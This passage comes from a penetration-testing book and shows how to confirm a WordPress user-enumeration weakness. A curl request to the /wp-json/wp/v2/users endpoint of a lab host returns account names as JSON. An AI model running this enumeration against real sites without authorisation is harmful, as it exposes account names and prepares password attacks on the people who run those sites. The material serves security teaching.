`

Figure 5-2

The WordPress login page

Lastly, verify the third finding: the WordPress user-enumeration

vulnerability, which allows you to gather information about

WordPress accounts. By default, every WordPress instance exposes

an API endpoint that lists WordPress system users at /wp-

json/wp/v2/users. This endpoint usually doesn’t require

authentication or authorization, so a simple GET request should

return the list of users.

We’ll use cURL to send this request and pipe the response to jq

to prettify the JSON output that comes back. The result should be an

array of user data:

$ curl -s http://172.16.10.12/wp-json/wp/v2/users/ | jq

[

{

"id": 1,

"name": "jtorres",

"url": "http://172.16.10.12",

"description": "",

"link": "http://172.16.10.12/author/jtorres/",

"slug": "jtorres",

},

--snip--

]

Black Hat Bash (Early Access) © 2023 by Dolev Farhi and Nick Aleks